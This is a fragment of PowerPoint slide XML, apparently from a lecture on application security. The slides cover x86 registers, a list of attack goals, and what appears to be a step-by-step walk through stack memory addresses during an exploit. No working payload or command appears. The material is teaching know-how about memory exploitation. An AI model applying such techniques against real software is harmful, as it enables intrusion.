              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e5c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e61</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e66</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e67</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697515" y="368827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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836896940"/>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188</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="611614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0xbffff5f0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0x0806e91a</a:t>
                      </a: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663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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1856466377"/>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189</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="574251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0xbffff5f4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0x0806e91b</a:t>
                      </a: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42271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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8404909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28" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>x86 Registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003529" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two registers are used for high-speed memory transfer operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>si</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (source), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/di (destination)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are several 32-bit special purpose registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: the stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: the frame pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003531" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="3028950"/>
            <a:ext cx="38100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endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003532" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3028950"/>
            <a:ext cx="9906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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ah</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003533" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="3028950"/>
            <a:ext cx="9144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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>al</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003534" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477001" y="2272784"/>
            <a:ext cx="505267" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003535" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="3644384"/>
            <a:ext cx="402674" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003536" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16210247">
            <a:off x="7600950" y="2955131"/>
            <a:ext cx="114300" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70833"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003537" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6667500" y="990600"/>
            <a:ext cx="228600" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 95833"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003538" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="4800600"/>
            <a:ext cx="38100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endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003539" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4800600"/>
            <a:ext cx="1905000" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003541" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6461125" y="4044434"/>
            <a:ext cx="441146" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003542" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7451725" y="5416034"/>
            <a:ext cx="338554" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>si</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003543" name="AutoShape 23"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16210247">
            <a:off x="7524750" y="4726781"/>
            <a:ext cx="114300" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70833"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003544" name="AutoShape 24"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6591300" y="2762250"/>
            <a:ext cx="228600" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 95833"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1508083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352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2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52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352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0352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190</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="538855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0xbffff5f8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7222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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2131887313"/>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191</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="502476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0xbffff5fc</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0x080bb6d7</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97240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2012903043"/>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192</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="465113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0xbffff600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2361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551552510"/>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193</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="465113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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff600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0x0809a67f</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51146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49110049"/>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194</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="428266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0xbffff604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663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758873095"/>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195</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="39287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0xbffff608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0x0806e91b</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42271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474728132"/>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196</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="354524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0xbffff60c</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70218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853965919"/>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197</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="318144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0xbffff610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0x080bb6d7</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97240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971987732"/>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198</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="281765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0xbffff614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2361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289708995"/>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199</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="281765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0xbffff614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0x0809a67f</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52129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793651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Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications provide services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Locally (word processing, file management)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remotely (network services)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The behavior of an application is determined by the code being executed, the data being processed, and the environment in which the application is run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application attacks attempt to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Violate confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Violate integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Violate availability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1402352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1714" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x86 Registers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1011715" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Segment registers: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ds, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fs</a:t>
